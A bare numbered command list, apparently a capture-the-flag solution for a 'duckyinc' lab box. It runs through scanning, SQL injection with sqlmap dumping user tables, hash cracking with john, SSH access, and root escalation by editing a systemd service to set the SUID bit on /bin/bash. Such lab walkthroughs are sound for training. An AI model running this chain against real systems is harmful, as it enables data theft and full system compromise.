1 - nmap -A 10.10.38.225
2 - gobuster dir -u http://10.10.38.225/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
3 - http://10.10.38.225/products/1'
4 - sqlmap -r request.txt --dbs
5 - sqlmap -r request.txt -D duckyinc --tables
6 - sqlmap -r request.txt -D duckyinc -T user --dump
7 - sqlmap -r request.txt -D duckyinc -T system_user --dump
8 - john hash -w=/usr/share/wordlists/rockyou.txt
9 - ssh server-admin@10.10.38.225
10 - cat flag2.txt
11 - sudo -l
12 - sudoedit /etc/systemd/system/duckyinc.service
13 - ExecStart=/bin/sh "chmod +s /bin/bash"
14 - sudo systemctl daemon-reload
14 - sudo systemctl restart duckyinc.service
15 - /bin/bash -p
16 - cat /root/flag3.txt
